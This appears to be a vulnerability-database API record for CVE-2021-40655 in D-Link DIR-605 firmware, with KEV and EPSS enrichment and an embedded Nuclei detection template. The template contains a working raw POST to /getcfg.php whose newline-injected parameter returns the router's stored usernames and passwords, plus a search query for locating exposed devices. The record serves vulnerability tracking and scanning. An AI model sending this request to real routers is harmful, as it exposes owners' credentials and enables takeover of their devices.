{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-40655/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-40655/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-40655/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-40655/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-40655/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-40655"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-40655"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.86659,
      "kev": true,
      "percentile": 0.99732
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2021/CVE-2021-40655.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2021-40655\n\ninfo:\n  name: D-Link DIR-605 - Information Disclosure\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    An informtion disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version - 2.01MT. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page\n  impact: |\n    Unauthenticated attackers can obtain router credentials including usernames and passwords by exploiting information disclosure in the getcfg.php endpoint.\n  remediation: |\n    Apply firmware updates provided by D-Link or replace the device with a supported model.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/cve-2021-40655\n    - https://github.com/Ilovewomen/D-LINK-DIR-605/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-40655\n    cwe-id: CWE-863\n    epss-score: 0.86659\n    epss-percentile: 0.99732\n    cpe: cpe:2.3:o:dlink:dir-605l_firmware:2.01mt:*:*:*:*:*:*:*\n  metadata:\n    vendor: dlink\n    product: dir-605l_firmware\n    fofa-query: body=\"l_tb>DIR-605\"\n    max-request: 1\n  tags: cve,cve2021,dlink,kev,dir-605,info-leak,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /getcfg.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Cookie:\n        X-Forwarded-For: 127.0.0.1\n\n        SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/xml\")'\n          - 'contains(body, \"DEVICE.ACCOUNT\")'\n        condition: and\n# digest: 4b0a00483046022100a7d17a174f1f35ad2c08d6102374f2d934e79f344303e6e36d0e7014bc811a43022100a5c29be57f5b28d3bb1b1c741b5f19b5c44f497ea39f78354340ac8ac98d3967:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2021-40655"
}